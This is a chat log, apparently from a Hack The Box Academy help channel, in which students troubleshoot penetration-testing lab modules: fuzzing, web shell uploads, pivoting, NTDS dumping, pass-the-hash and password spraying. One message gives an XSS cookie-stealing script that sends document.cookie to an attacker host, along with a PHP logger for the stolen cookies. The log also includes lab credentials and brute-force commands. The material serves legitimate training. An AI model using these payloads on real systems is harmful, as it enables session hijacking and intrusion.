foggy monolith
#

Web Proxies § ZAP Fuzzer
Hint says to look for a response with a different Content-Length, but ALL responses have a Content-Length of 410. Why? any ideas?

cloud urchin
#

Are you using the md5 hash processor and on the correct page?

foggy monolith
cloud urchin
#

no just making sure

foggy monolith
# cloud urchin no just making sure

Well, what else is there? Did a search for this module on this channel and noticed that someone else was mentioning a missing character in the cookie; does that need to be cracked offline before another fuzz is attempted? And what about the cookie itself; no mention about it needing to be edited into the header either, which is strange considering it makes one wonder how ZAP is able to authenticate with it.

#

And tried without making any header modifications at all; again, nothing. A different size (246 bytes) but the responses are still all that size; there's no mix of 246 and any other response size. Again, why?

cloud urchin
#

could be any number of reasons really, maybe just go over the section again and confirm everything is set correctly

#

just sounds like something isn't setup correctly

foggy monolith
#

Fuzz location: check.
Payload: check (have ` top-usernames-shortlist.txt saved as a Custom File Fuzzer so I don't need to keep providing the full path to it every single time).
Processor: MD5 hash (check).
Options: defaults, because the module didn't tell me to make any changes to them.

So, what is wrong with this setup exactly?

#

Do I need to set the Set-Fetch-Dest, Set-Fetch-Mode and Set-Fetch-Site options that are mentioned in the module screenshots but that ZAP doesn't set at all?

#

I'm also noticing a Priority header, which is set by ZAP but isn't set in the screenshots the module provides, so if there's a ZAP setting to force it to set different headers than the ones it's setting, it would be appreciated.

foggy monolith
cloud urchin
#

idk i just tried it with all the correct settings and got it right away

#

there was one length clearly longer than the others

#

i did it with burp though i have to go to the store so i don't have time to setup zap right now

#

should be pretty similar though just make sure you're doing what the question asks and it should work

foggy monolith
shrewd depot
#

can someone help me with the custom worklist section in the login brutforce course ? I tried several username lists and password lists, but i didnt crack it

#

did i do something wrong ?

gray yacht
foggy monolith
#

Tried enabling Follow Redirects; it too was nothing.

shrewd depot
foggy monolith
gray yacht
foggy monolith
#

Preparing them; hold on

gray yacht
fallow elm
#

hi i have a problem with a specific question in a module JavaScript Deobfuscation , the answer (flag) seems to be right but the server won't accept it

#

it would be helpful if someone could test it

safe star
#

Did you add HTB{} to it?

cloud urchin
#

you don't need to post the flag in here

plain kernel
vapid thistle
#

In https://academy.hackthebox.com/module/116/section/1169
I found the password for the "mssqlsvc" user. However when I try to log in using either sqlcmd or impacket-mssqlclient it doesn't work.
I even tried the following from the solutions part:
"sqlcmd -S STMIP -U .\mssqlsvc" and it does not work either (login error in both cases). Has anyone a clue of what would be the issue?

fallow elm
fallow elm
vapid thistle
midnight galleon
#

Idk if this is the appropriate place to ask but can someone explains to me what exactly is a nameserver?
What I understand is that it is the record that tells you the ip/FQDN of the actual dns server that has the dns records, but what I am not getting is how are these nameservers FQDN themselves are resolved?

cloud urchin
#

through dns records for the domain

midnight galleon
#

Like when doing
Dig axfr inlanefreight.htb @ns1.inlanefreight.htb
How is it getting the ip of ns1?

cloud urchin
#

in that instance, it's because you specificed ns1. in your /etc/hosts file

#

when a domain is registered the registrant specifies a set of authoritative DNS servers, those are the servers responsible for storing the DNS records for the domain

midnight galleon
#

but isn't that ip corresponding to inlanefreight.htb itself?

cloud urchin
#

no, the ip you put in /etc/hosts corresponds to the host you pair it with in /etc/hosts

#

when a DNS request from a computer is made, the computer will first check itself to see if that is the host being called. after that it checks the hosts file, then it reaches out to the DNS server. so its obtaining the host from the IP you set in the hosts file.

midnight galleon
cloud urchin
#

the authoritative dns servers are a type of nameserver

midnight galleon
#

What I am not getting is that when I get the ip from htb for instance and I see that port 53 has a dns, does that means that ip is a nameserver since it stores dns records?

cloud urchin
#

no. any app can be running on port 53, it doesn't really mean anything unless the service running on that port is something that responds to dns requests, which by default is what's used for port 53

midnight galleon
#

Also, what is the process of assigning a specific host name to an ip address like when we do for boxes on htb main platform?

midnight galleon
vivid sigil
#

may i dm anyone for this module Shells & Payloads>PHP Web Shells

cloud urchin
#

just ask here

vivid sigil
#

module Shells & Payloads>PHP Web Shells
Q/ Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)

when i uploaded WhiteWinterWolf's PHP Web Shell and intercept by burpsuite to change the connect-type from application/x-php to image/gif and now i try to use the web shell

https://ip/images/vendor/connect.php didnt work

vapid thistle
cloud urchin
#

did you try navigating to the php file you uploaded

#

just normally, without burp

foggy monolith
vivid sigil
#

i tried again with copy raw file and it works

rocky estuary
sick whale
#

DM @rocky estuary

rocky estuary
rocky estuary
#

now i need to access the ms01 domain

safe star
#

have you tried using the credentials across the network

rocky estuary
safe star
#

what about netexec

proper oar
#

Has the proxyshell exploit in the Vulns section under Exchange in the AD path worked for anyone? Just dies for me after a long time

rocky estuary
proper oar
#

it's the maintained fork of crackmapexec

foggy monolith
safe star
#

crackmapexec

foggy monolith
proper oar
#

^

safe star
#

i also dont remember using a script for payload processing

foggy monolith
cloud urchin
#

so use another tool

foggy monolith
#

A crippleware tool?

cloud urchin
#

you'll find the community version of burp is quite capable

safe star
#

yeah i used burp for that too

cloud urchin
#

there are also two tools imo that a company should pay for the pro version for, for pentesting. burp suite and nessus.

next bronze
#

real, imagine pentesting webapps without burp pro

sick whale
#

Anyone moved to caido yet?

next bronze
#

caido is still missing a lot of features last time I tried it

sick whale
#

It's developping pretty quickly.

I'm actually using Burp CE and paying Caido for support :p
That way we put pressure on Burp to either lower the prices of Pro, or include more features in CE to be competitive :p

bright glade
#

For gobuster directory finder, what the shortest word list? The one provided (usr/share/dirb/wordlists/common.txt) doesn't exist

#

I can only find usr/share/dirbuster/wordlists/ and it doesn't contain a common.txt

digital parrot
#

Wait what time is it rn my phone won’t show

bright glade
#

I tried use directory-list-2.3-small but it still takes like super long for it to fully complete

#

Time is relative but 1pm +8GMT

digital parrot
#

No but like just the regular time

#

Like 5:45 :600

shut quest
bright glade
#

Ahhh

cloud urchin
# bright glade Time is relative but 1pm +8GMT

actually time passes more slowly for objects moving close to the speed of light or strong gravitational fields (time dilation), this means time is actually objective, a physical reality that exists independently of human perception

shut quest
eager ledge
#

Hi,

Module: Attacking Common Applications
Section: WordPress - Discovery & Enumeration
Section link: https://academy.hackthebox.com/module/113/section/1100

I am not able to find the plugin:

Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).
I have checked categories, archives, author, search pages source code. Can anybody give any hint please?

autumn pilot
#

Enumerate the website and not just the home page

eager ledge
safe star
#

did you grep for "plugins" on each page

autumn pilot
#

Keep digging, there are other pages

eager ledge
eager ledge
safe star
eager ledge
tender nimbus
#

Hey guys, do you know a good cursus or blog post or something else where you can learning making you own payloads?

limpid hemlock
#

Hey in linux priv esc section The logrotten part i try to run a command to get a shell connection ./logrotten -p ./payload ./backups/access.log But i get an error saying version GLIBC_2.34 NOT FOUND ANY HELP

tender nimbus
#

so i can craft my owns

#

and i can understand what happens

tender nimbus
# safe star What type of payloads

also little question about archive a payload, archive is just like crafting it with compression, obfuscation, putting a password on it etc to bypass anti viruses right?

wheat basalt
#

Hii

safe star
# tender nimbus like reverse shells

theres a reverse shell payload for majority of tools you can think of, the best thing to do is just break the command down and understand what it does

safe star
tender nimbus
#

i mean thats what i saw in the module

safe star
#

just going to stay like that until unzipped

#

what module

vocal rover
#

Hello, I'm scanning a machine in Job Role path where the question is "Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080? "
I ran a scan on machine but this does show the version of service running on port 8080. It just show "Apache tomcat"

limpid basin
#

Hi All, First time posting: Nice to meet you all.
in the module: Windows Attacks & Defense
the module keeps making reference to a dictionary for hashcat called password.txt, forgive my ignorance, but where do i find this dictionary? i have been using my own/john and i assume it would be faster to use the one they ref but i cant find it

marsh echo
#

You looked in the resources provided by htb at the top right of the section page ?

vocal rover
#

I got an answer. It was just "Apache Tomcat". I was thinking that it will some kind of number. Is that not a meaning of version? or I'm thinking in wrong way

limpid basin
marsh echo
rustic sage
limpid basin
marsh echo
normal sand
#

Module: Windows Privilege Escalation
Section: Initial Enumeration

I see less permissions when I run the command whoami /priv in a regular PowerShell window compared to when I right click PowerShell and click "Run as Administrator". In both cases when I run just whoami, it returns winlpe-srv01\htb-student.

Can someone please explain why more permissions show in the window that's being "Run as Administrator"?

#

FYI, I ran net localgroup Administrators, and the output doesn't list winlpe-srv01\htb-student as part of the Administrators group, so now I'm confused how I was able to even run PowerShell as Administrator.

Administrator
helpdesk
htb-student_adm
mrb3n
sccm_svc
secsvc
worldly pike
#

hello in this question i ran the command and it taking very long it say remining about 50m am i doing it correct? can i say the command here or no?

quiet trout
#

important to recognize the difference, use the top 10000 ports or whatever its called --top-ports 10000 i think the modifier is

worldly pike
#

-sT -p-

quiet trout
#

ok, yeah its the port part, try reducing the number of ports, leave the one you got going and start a new one

old oasis
#

Hey guys, I know the OSINT: Corporate Recon module is not part of the CPTS but do you think it's worth the cubes to get it? To improve my recon methodology.

worldly pike
#

so --top-ports 10000?

quiet trout
#

scanning all ports takes a WHILE, add in the tcp 3-way and you're compounding it

ebon minnow
#

Module: Pivoting, Tunneling, and Port Forwarding
Section: Meterpreter Tunneling & Port Forwarding

Question 2 - Segmentation Fault on the pivot host and meterpreter session closes immediately upon executing the elf binary on the pivot host. What am I doing wrong?

Ive checked and double checked all params\

quiet trout
#

i think ippsec uses thats option as well to speed up the scans on a preliminary

#

or maybe i picked that up somewhere else but it speeds up the scan considerably while still scanning valuable ports

worldly pike
#

imma scan and see if it give me correct answer

quiet trout
#

it might be --top-ports 1000 (someone here told me theres another cmd that is inclusive of this) let me spin up my kali and check my alias

worldly pike
#

i think you meant -F

quiet trout
#

fuckin broke my kali vm a few weeks ago trying to be a cool guy, aint wanted to touch the thing ever since

worldly pike
#

that okay imma try something else

quiet trout
#

yeah its similar to -F but that only does top 100

#

you can start there though that may be advisable

#

yeah start low and work your way up, 65k port scans plus tcp connect takes ages

quiet trout
#

i think the nmap-formatter part may be redundant? there might be a way to get that output with just straight nmap but that plugin helps colorize it and stuff, i get tunnel vision looking at nmap output so i use that

worldly pike
#

the -F give me 7 ports and higest is 445 which wrong imma try top 1000

#

got it thank you
nmap -sC -sV (IP) --top-ports 1000 -Pn -oX target.xml

quiet trout
#

ok so keep in mind that -F and --top... dont give the HIGHEST ports

#

they give me the most common or popular

worldly pike
#

right thank you

ebon minnow
#

Module: Pivoting, Tunneling, and Port Forwarding
Section: Meterpreter Tunneling & Port Forwarding

Question 2 - Segmentation Fault on the pivot host and meterpreter session closes immediately upon executing the elf binary on the pivot host. What am I doing wrong?

Ive checked and double checked all params

void hemlock
#

Module: Active Directory Trust Attacks
Section: Abusing SQL Server Links
I am unable to RDP into the machine when I use the provided credentials (Administrator:HTB_@cademy_adm!). I also tried to PSexec into the machine but I keep getting Login failure (so likely linked to the provided creds). Can someone check the config of the box please? I've also provided the logs from RDP and Psexec:

[12:05:24:838] [47796:47797] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:05:24:838] [47796:47797] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:05:24:838] [47796:47797] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail

Password:
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.

tribal plinth
void hemlock
ebon minnow
#

Module: Pivoting, Tunneling, and Port Forwarding
Section: Meterpreter Tunneling & Port Forwarding

Question 2 - Segmentation Fault on the pivot host and meterpreter session closes immediately upon executing the elf binary on the pivot host. What am I doing wrong?

Ive checked and double checked all params

eager ledge
ebon minnow
normal sand
void hemlock
# tribal plinth The credentials for Jimmy & htb-student are provided in the section along with t...

I used the below creds and I still can't RDP into ACADEMY-ADTRUST-CFSQL01

Do you trust the above certificate? (Y/T/N) Y
[12:23:54:796] [57281:57282] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:23:54:796] [57281:57282] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:23:54:796] [57281:57282] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[12:23:54:796] [57281:57282] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
                                                                                                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/Academy]
└─# xfreerdp /u:htb-student /p:'HTB_@cademy_stdnt!' /v:10.129.86.205 /dynamic-resolution /drive:linux,/tmp
[12:24:14:666] [57486:57487] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[12:24:14:666] [57486:57487] [WARN][com.freerdp.crypto] - CN = SQL01.inlanefreight.ad
[12:24:14:870] [57486:57487] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:24:14:870] [57486:57487] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:24:14:870] [57486:57487] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[12:24:14:870] [57486:57487] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1```
tribal plinth
void hemlock
quiet trout
#

did your target expire?

#

ping the target? also svcs take a few minutes to boot on windows boxes, thats why you wait af ew

tribal plinth
void hemlock
ebon minnow
#

could i get help with pivoting? followed the guide to a T but still get errors after resetting the machine

eager ledge
ebon minnow
#

my machines IP when connected via VPN

quiet trout
eager ledge
#

Can you send the error that you get when you execute backupjob?

ebon minnow
quiet trout
#

oh no, yeah, i realize you're dealing with a separate issue just wanted to pass along a trick i found helpful

ebon minnow
eager ledge
#

May be the issue is that you are using the staged payload linux/x64/meterpreter/reverse_tcp. Can you try using the stageless payload linux/x64/meterpreter_reverse_tcp instead?

eager ledge
# ebon minnow

You are not setting up the payload when using exploit/multi/handler module.

quiet trout
void hemlock
# tribal plinth It takes approx 2-3 mins for the VM to be completely UP along with the Domain Co...

I have another issue when trying to connect to SQL02\SQLEXPRESS:

SQL query: select * from openquery("SQL02\SQLEXPRESS",'select SUSER_NAME()')
Logs:
OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "Login timeout expired".
OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
Msg -1, Level 16, State 1, Line 0
SQL Server Network Interfaces: Error Locating Server/Instance Specified [xFFFFFFFF].

Completion time: 2024-09-30T05:40:29.2162914-07:00

quiet trout
# ebon minnow

i saw you had lhost in your cmd, you do have rhost set right? your target? sorry if this has been covered already.

quiet trout
#

oh i see, right on. just a sanity check

eager ledge
quiet trout
eager ledge
# ebon minnow

In the msfconsole, after use exploit/multi/handler, you can see the message Using configured payload generic/shell_reverse_tcp. Before executing run, you should also set up payload as set payload linux/x64/....

ebon minnow
void hemlock
#

@tribal plinth Any chance you can have a look at my previous message. I am unable to run queries on SQL02/SQLEXPRESS from SQL01/SQLEXPRESS

tribal plinth
void hemlock
tribal plinth
#

Yup, same!

void hemlock
# tribal plinth Yup, same!

OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "Login timeout expired".

fickle spindle
#

Where can I ask some questions to clear my doubts ?

eager ledge
void hemlock
# tribal plinth Yup, same!

OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online."

eager ledge
storm elk
fickle spindle
#

General problems about like pentest stuff.

midnight galleon
#

Windows PrivEsc - Built in groups
after backing up the entire c drive to e, i still can't take a backup of ntds.dit

#

made sure that SeBackupPrivilege is enabled

#

same with the contract file too

quiet trout
#

replication issue? for the new privs?

midnight galleon
quiet trout
# midnight galleon what is that

may not come into play here but sometimes the DC needs to replicate changes to user accounts, group memberships, priveleges, etc.

midnight galleon
#

didn't get it

#

like dc needs time to make changes?

#

i mean surely this is not the case

#

ok robocopy worked

#

but still why the first method didn't

#

ok cracked administrator but can't rdp

next bronze
midnight galleon
next bronze
#

that's what the error means

#

also why do you even need to crack it? just pth

midnight galleon
#

still logon failure

next bronze
#

well that's what the error means

midnight galleon
midnight galleon
#

i even copied the file from the system32 folder instead of using the one that the author of the section forgot to delete

quiet trout
#

did u specify the domain alongside the acct?

#

eagle\administrator vs administrator ?

#

or w/e it is... eagle.local, contoso.local, etc.

midnight galleon
#

dumped sam too, same hash

twilit pumice
#

Hello Guys Does anyone know where is the channel of HTB CTF because I want to ask questions regarding the CTF ?

midnight galleon
quiet trout
#

No. it must be specified or a (non domain) Admin acct may be trying to be logged in

next bronze
#

nah xfreerdp detects the domain

quiet trout
#

oh, i see, didnt know that

#

never a bad idea to include it just as a sanity check

midnight galleon
#

OK does windows has something like su

#

Rdp with htb student works just fine

next bronze
#

I'm checking but like I said, that error means the creds are wrong, have you tried using the others?

midnight galleon
#

Lol
Did runas
Also said wrong creds

midnight galleon
next bronze
#

what are the other users

midnight galleon
#

ntds has kerberos tickets but i don't wanna go into that weed

#

lol literally tried pth for svc_backup with the hash in this file and it didn't work

#

is this bugged or something?

dim gorge
#

Hello all. In the "SeImpersonate and SeAssignPrimaryToken" section of the "Windows Privilege Escalation" module I can't connect to the target via RDP (using remmina from pwnbox). Same thing if I use the vpn from a local pc. The error message is "Cannot connect to the RDP server". Any ideas?

next bronze
#

contect support to sort it out thanks

wicked apex
#

Module: Cross-Site Scripting
Section: Session Hijacking
I had both script.js and index.php preped:
script.js
||new Image().src='http://VPNIP:PORT/index.php?c'=+document.cookie;||
index.php
||

   $list = explode(";", $_GET[c]);
   foreach ($list as $key => $value) {
       $cookie = urldecode($value);
       $file = fopen("cookies.txt", "a+");
       fputs($file, "Victim IP: {$_SERVER['VPNIP:PORT']} | Cookie: {$cookie}
");
       fclose($file);
   }
}?>``` ||  
I had the php listener running in 0.0.0.0:80 and inputted the XSS payload ||">  ||  (with the VPN ip and port of course) and sent to the hijacking form.
But afterall, even had I obtained a 200: GET /script, I couldn't obtain the cookie from the target.
Can someone point out some mistakes I missed?
(Its all in the same dir where the php listener hosted)
formal lintel
#

hello! someone did the module login brute forcing?

formal lintel
#

I am in Skills Assessment Part 1 and i have a question because i cant do it jajaja

jaunty drift
jaunty drift
midnight galleon
scarlet pilot
#

Hello everyone

normal sand
junior flicker
#

Hi Everyone, I'm working through Password Attacks, the Linux Local Password Attacks section. I have Will's password and am trying to get root's, but have hit a wall. I found the .backups folder, downloaded the .bak files to my attack system and unshadowed them. Sadly my attempts at cracking the hash with hashcat have failed. I used the same command as the reading, am I missing something?

storm elk
pseudo kiln
# normal sand Does anyone know anything about this? https://discord.com/channels/4737603152936...

That's where windows tends to get complicated. In short when UAC is enabled, to protect the system, even if a user has been granted some privileges, they are disabled unless specifically enabled. I know that does not even scratch it and HTB does not explain it much either. For me what really helped understand is this video series, at least first video and first half of the second one, then it gets more advanced.
https://www.youtube.com/playlist?list=PLwb6et4T42ww94O3z5QDNQsO1f_BwhX-L

gray yacht
thorny sluice
#

For the Cross-Site Scripting (XSS) module and section phishing I got my answer and somehow its getting denied

gray yacht
junior flicker
junior flicker
shut vapor
sonic plume
green shuttle
sonic plume
junior flicker
junior flicker
normal sand
gray yacht
verbal mirage
#

o

upper ruin
#

can someone explain why hydra gives out false positives?

glacial minnow
#

anyone doing the nmap module?

#

basically nothing is working for me, im trying to find the service versions but im getting filtered and host unreachable

shut vapor
#

download the VPN
Not if you're using pwnbox though, just restart the lab

#

If you're still having trouble, let me know the section and I can give you a sanity check.

glacial minnow
#

im reseting the box and switching to pwnbox

#

yeah ping wasn't working, let me check now

harsh tulip
#

guys is there any issues with the academy VPN ?

glacial minnow
#

maybe

#

i had trouble with nmap

#

try pwnbox

pliant yacht
#

having a strange issue when i sV a ip i dont see the full version name the questions asking for

pliant yacht
#

─# nmap -sV 10.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 19:38 BST
Nmap scan report for 10.129.131.233
Host is up (0.020s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38

#

question needs ((debian or ubuntu))

#

but i only know this after looking it up after 5mins

steel coral
#

yo important

#

a guys has my number and wants to ban me from whatsapp

#

can I eventually do something about it?

formal lintel
#

hello! someone did the module login brute forcing?

storm elk
pliant yacht
finite abyss
#

@storm elk
Could you please help on CL.TE lab
I have searched through the entire lab, the application doesn't have any functionality.
The application is not considering the reveal_flag parameter when provided as POST body.
So I am not sure where I can find a POST request to perform the CL.TE attack.
https://academy.hackthebox.com/module/191/section/2060

timber hatch
#

digital forensic modul, the windows servers are so lagging, not funny at all to do the modul

storm elk
#

Dm me what you’ve tried etc 🙂

limpid hemlock
#

Hey anyone knows how to complete shared object hijaking from linux privesc section

#

I was trying to look for a file names payroll its not found anywhere in target system we get

uneven dune
random light
#

I need some tip for Password Attacks Lab - Easy
I found user creds and log in but i cant find anythink root related

pliant yacht
#

Its normal for a nmap scan to take like a full 2 mins to conduct on this site?

#

Genuinly going back to THM if this continues to be slow

proper oar
#

MSSQL, Exchange, SCCM skill assessment:
Is the || GlobalAddress List supposed to be available with MailSniper?|| I've tried ||several CVEs in Metasploit and checked that the version appears to be later than those, so I'm assuming that is not the route. I have the passwords to spray based on the document on the desktop seen via RDP, and I found 3 users to name-mash for a User list. || Is this all that is needed to proceed?

pseudo kiln
#

Yeah great resource, his series on kerberos also good content, everything is explained in detail from high level to which bits are set in wireshark captures

quaint spear
#

Now, execute the KQL query that is mentioned in the "Wildcards and Regular Expressions" part of this section and enter the number of returned results (hits) as your answer.

#

how to do it I am unable to get any result

gray yacht
random light
#

ok

twilit cipher
#

Does anyone know if the module on Using CrackMapExec is going to be replaced with another tool that is being updated, like NetExec or something. I couldn't care less about all the drama surrounding the tool, I just want something that works, and I am having a helluva time getting through the module with a broken tool.

analog dock
#

It’s the same tool, just a different name, and maintained

distant moat
#

hello guys , is it me or the file that they attached to the module intro to assembly language module : debugging with gdb is broken ?? i cant seem to place any breakout point after the run command ??

twilit cipher
analog dock
#

But I recommend just using netexec

twilit cipher
#

I'll take a swing at it and see.

analog dock
#

Alright, good luck

twilit cipher
#

But the module will for sure have to be updated.

analog dock
#

Yeah would be better to just update it with netexec instead

oak kernel
#

Hi, on Broken Authentication - Brute-Forcing Password Reset Tokens, the question:
"On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?"
..I can't get this one right, it says in the text: "This password-recovery functionality typically relies on a one-time reset token" .. but it seems to be incorrect? 🤔

#

oh nevermind, got it right now .. at last 😛

distant moat
#

Someone did the binary exploitation path here???

sacred gull
#

Hey in the evading windows AV module. I placed my file in, it says in the log file that it goes undetected but no flag.txt is created

ebon minnow
#

hey, got the flag for the question "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer." in the Web Server Pivoting with Rpivot module but its incorrect. What mistake am i making?

sacred gull
ebon minnow
sacred gull
#

Np, its happened to all of us

#

😂

tender nimbus
#

hey guys im doing the pasword cracking module, which user and password lists would you recommend to use?

ebon minnow
#

and when you make the password mutations, follow the guide and save the mutated passwords. Learned this the hard way for that module lol

unique ether
#

shells and payloads skills assessment qn 2 i tried using a webshell and changing the contentype to .war using burpsuite it said FAIL - File uploaded must be .war

#

can someone tell me why this method did not work

#

is it because Tomcat underlying technology is Java

safe star
#

Its checking for real war files

unique ether
#

i solved the qn but i couldnt trick it to thinking it

cloud urchin
#

file upload module will teach you the ways

safe star
unique ether
foggy monolith
#

Attacking with Ffuf § Value Fuzzing
ID is being correctly filtered out by response size, but when I go to paste the fuzzed ID into the browser (i.e. by polluting the id= parameter), the flag isn't returned. Do I need to use "curl -X POST" to actually get it or something?

#

I actually filtered by response size and got back an ID that returned a different response size, but when I try to pollute the parameters with that ID in Chrome, again, nothing. Why?

cloud urchin
#

what do you mean?

foggy monolith
# cloud urchin what do you mean?

If I try to manually type http://admin.academy.htb:REDACTED/admin/admin.php?id=REDACTED` into Chrome's address bar after successfully having fuzzed the value, it still says I don't have access.

cloud urchin
#

are you making a post request?

#

i got it without issue

cloud urchin
foggy monolith
cloud urchin
#

yeah it's easier with curl

viral snow
#

Hey y'all!

I'm in Login Brute Forcing - Custom Wordlists.

I'm using the hydra command as shown in the module, but it's not working.

I even used some modifications, and I'm getting nothing!

Has anyone completed this module? It's the updated version.

If you've completed it, can you give me some pointers?

I've been trying to use

cloud urchin
#

I just completed that updated section yesterday, I just followed what was in the section and got the answer

viral snow
cloud urchin
#

maybe restart the target, i think i followed it 1:1 (changing the ip/port of course)

cloud urchin
#

did you do all the steps to create the wordlist correctly?

cloud urchin
#

ok then you messed up somewhere on the wordlists or the command

#

those are really the only things it can be

viral snow
cloud urchin
junior flicker
cloud urchin
#

and you did all the cupp stuff correctly? every answer?

#

it can't really be anything else beyond the wordlist or the command syntax if you can reach the target.

safe star
#

you should be able to get it following exactly what they do

viral snow
safe star
#

i just copied and pasted to finish the module 😭

cloud urchin
#

yeah idk. maybe delete all your lists, cupp, username-anarchy, and redownload it all and start completely fresh

viral snow
junior flicker
#

@gray yacht Did you see my dm?

gray yacht
unique ether
#

how do you restart a modules progress

viral snow
#

🤦🏽‍♂️🤦🏽‍♂️🤦🏽‍♂️ of course it works after I get up to stretch, run to the RR, and grab me a bottle of water 😩😩😩

dapper moth
#

Anyone for a nudge on the Abusing HTTP Misconfiguration - Skills Assessment Hard?
I was able to generate a Cookie Grabber XSS payload that works (because I can make it work on myself) but it's not triggering so I don't know if I'm doing it in the wrong target or something.

cloud urchin
safe star
#

3?

autumn dew
#

guys i need help i just put everything and its not working

foggy monolith
# safe star 3?

Well at least I thought so, since you need to fuzz 3 parameters.

safe star
#

are you supposed to use eternal blue?

foggy monolith
#

And I'm trying to, to no avail.

autumn dew
autumn dew
safe star
#

what module

autumn dew
#

metasploit

safe star
#

the question clearly says what to exploit

#

and its not eternal blue

light fern
#

hi

safe star
#

yo

light fern
#

hi!

#

im new sooo

light fern
#

foggy monolith
safe star
foggy monolith
#

Having to resort to actually running nmap first before ffuf to figure out what other ports are open.

autumn dew
#

its eternal blue

safe star
#

is this modules section?

tribal pumice
#

Hi folks, I was going through the Getting Started modules and in the Nibbles - Web Footprinting section it looks like Gobuster output is referencing a wordlist that no longer exists /usr/share/dirb/wordlists/common.txt

safe star
#

Use Locate common.txt and use the seclists one

tribal pumice
#

Yup, I ended up using a different wordlist, might be worth updating the snippet with a recommended wordlist

foggy monolith
autumn pilot
#

which modules is that from

#

Attacking Web Applications with Ffuf?

foggy monolith
#

Yes.

autumn pilot
#

You've been given a port, why would you fuzz it?

foggy monolith
#

"One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" with a hint stating it should be running on a port different from the one provided

next bronze
#

maybe read the hint better to understand what it's asking

#

in the answer, just replace the dynmaic port given with the string PORT

foggy monolith
rustic sage
#

Password Attacks
Network Services

been on this for 20 minutes, password is not being checked for winrm

autumn pilot
#

This happens when the window is smaller than the expected for ffuf and it cannot line wrap correctly

rustic sage
#
$ crackmapexec winrm 10.129.206.199 -u username.list -p password.list
#

my command line that i done

autumn pilot
#

You can grep for a success, e.g., on [+]

rustic sage
#

so all i do is

#

grep "[+]" ?

autumn pilot
#

Try and see

foggy monolith
autumn pilot
#

Keep digging, play with threads, fuzz for directories and etc

foggy monolith
#

Increase recursion depth?

autumn pilot
#

Increasing the threads can introduce false-negatives and skip directories that are present

#

Start one by one

rustic sage
#

search still continues, shouldnt take this long for an academy path

safe star
rustic sage
safe star
#

yes

next bronze
safe star
rustic sage
#

Hi all 🙂 Im starting the AD module, and i dont really understarnd why i cant find the 172.16.5.100 mentionned in the course. It never appears, not with wireshark, not with tcpdump and not with fping, not even with nmap. Ive only got 3 alive machines , 5,225 & 130. Is it normal? Thanks 🙂

next bronze
#

deleted the message because it contains answers, try using another shell or use remote tools

full echo
#

Which one?

regal sigil
next bronze
lofty halo
regal sigil
regal sigil
#

but dont understand why I cant import powerview with it

next bronze
pseudo kiln
#

If i'ts restricted or something else, they show how to "bypass it"

regal sigil
next bronze
#

make sure to download the raw file

regal sigil
cosmic juniper
#

Good day, I am new to HtB Academy. I just finished a module that I would like to access offline. Is there a place I can access a PDF version of the completed module?

autumn pilot
#

There isn't such a thing, but what you get is a lifetime access to the module and its future updates

surreal beacon
#

Hey in what country is ceh most recognized?

solar kernel
#

Is the Starting Point Archetype box bugged? I got the flag but it's not submitting

normal sand
#

Module: Windows Privilege Escalation
Section: Communication with Processes
Link to section: https://academy.hackthebox.com/module/67/section/926

At the end of the section it states:

From here, we could leverage these lax permissions to escalate privileges on the host to SYSTEM.

I assume the method of doing this will be discussed later in the module?

next bronze
normal sand
#

Thanks

next bronze
normal sand
next bronze
#

I thought someone has already answered that thonk

normal sand
next bronze
#

fair enough

#

run as admin doesn't necessarily mean you have to be an admin, it really does UAC token elevation, some permissions can be assigned to users even if they're not in an admin group, but depends on how the integrity level is configured, it will not be available to the default token, so when you run as admin, that process is ran with the elevated token and you'll see more permissions
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/how-it-works
https://learn.microsoft.com/en-us/windows-server/security/user-account-control/how-user-account-control-works

rapid fog
#

Hi everyone,
